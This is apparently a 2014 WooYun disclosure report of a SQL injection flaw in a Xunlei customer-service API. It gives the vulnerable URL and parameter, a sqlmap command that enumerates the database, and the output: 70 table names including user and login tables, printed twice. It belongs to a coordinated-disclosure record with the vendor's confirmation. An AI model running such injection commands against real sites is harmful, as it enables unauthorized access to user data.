迅雷某API接口存在SQL注入漏洞

发表于 2014年12月30日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-089321

漏洞标题：迅雷某API接口存在SQL注入漏洞

漏洞详情

披露状态：

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认，细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述：

额。。。感谢乌云，感谢党，终于会挖洞了，

详细说明：

http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001参数contentno存在sql注入，字符型

漏洞证明：

python sqlmap.py -u "http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001" -p "contentno" --tables -D xlhelp2

1	python sqlmap.py -u "http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001" -p "contentno" --tables -D xlhelp2

结果

Database: xlhelp2<br>
[70 tables]<br>
+----------------------------+<br>
| accountappeal              |<br>
| accountappeal_2010         |<br>
| accountappeal_2011         |<br>
| accountappeal_20110510     |<br>
| accountappeal_2012         |<br>
| accountappeal_20130802     |<br>
| accountappealremark        |<br>
| accountappealresult        |<br>
| advplace                   |<br>
| advs                       |<br>
| appealgameinfo             |<br>
| articles                   |<br>
| complaintsstatistics       |<br>
| contents                   |<br>
| copartners                 |<br>
| d                          |<br>
| datatablebiz               |<br>
| datatabledetail            |<br>
| datatables                 |<br>
| demonquestions             |<br>
| demonquestions_20110701    |<br>
| formdata                   |<br>
| forminfo                   |<br>
| functionlogs               |<br>
| functions                  |<br>
| gameactivity               |<br>
| gcid                       |<br>
| hislogininfo               |<br>
| hotkeywords                |<br>
| hotquestions               |<br>
| libclassd                  |<br>
| libclassm                  |<br>
| libconfig                  |<br>
| mailclass                  |<br>
| mailinfo                   |<br>
| mailsendtemp               |<br>
| menus                      |<br>
| placardclass               |<br>
| placards                   |<br>
| plusoperation              |<br>
| problemreplies             |<br>
| problemreplies_20110812    |<br>
| productquestionclass       |<br>
| products                   |<br>
| questions                  |<br>
| questionsfeedbacks         |<br>
| researchdata               |<br>
| researchinfo               |<br>
| role_product               |<br>
| rolerights                 |<br>
| roles                      |<br>
| rtnappealidinfo            |<br>
| selfservice                |<br>
| stepreasons                |<br>
| userbbs                    |<br>
| useronline                 |<br>
| useronlinetime             |<br>
| users                      |<br>
| usertobizno                |<br>
| usertofunction             |<br>
| usertomailclass            |<br>
| usertorole                 |<br>
| workorder                  |<br>
| workorder_20110812         |<br>
| workorderdispatch          |<br>
| workorderdispatch_20110812 |<br>
| workorderflow              |<br>
| workorderflow_20110812     |<br>
| workorderquestionstat      |<br>
| xlusers                    |<br>
+----------------------------+

Database: xlhelp2

[70 tables]

+----------------------------+

| accountappeal |

| accountappeal_2010 |

| accountappeal_2011 |

| accountappeal_20110510 |

| accountappeal_2012 |

| accountappeal_20130802 |

| accountappealremark |

| accountappealresult |

| advplace |

| advs |

| appealgameinfo |

| articles |

| complaintsstatistics |

| contents |

| copartners |

| d |

| datatablebiz |

| datatabledetail |

| datatables |

| demonquestions |

| demonquestions_20110701 |

| formdata |

| forminfo |

| functionlogs |

| functions |

| gameactivity |

| gcid |

| hislogininfo |

| hotkeywords |

| hotquestions |

| libclassd |

| libclassm |

| libconfig |

| mailclass |

| mailinfo |

| mailsendtemp |

| menus |

| placardclass |

| placards |

| plusoperation |

| problemreplies |

| problemreplies_20110812 |

| productquestionclass |

| products |

| questions |

| questionsfeedbacks |

| researchdata |

| researchinfo |

| role_product |

| rolerights |

| roles |

| rtnappealidinfo |

| selfservice |

| stepreasons |

| userbbs |

| useronline |

| useronlinetime |

| users |

| usertobizno |

| usertofunction |

| usertomailclass |

| usertorole |

| workorder |

| workorder_20110812 |

| workorderdispatch |

| workorderdispatch_20110812 |

| workorderflow |

| workorderflow_20110812 |

| workorderquestionstat |

| xlusers |

+----------------------------+

修复方案：

好人一生平安

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-12-3013:53

厂商回复：

感谢反馈。属于迅雷客服应用。

评价

原文连接：迅雷某API接口存在SQL注入漏洞 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。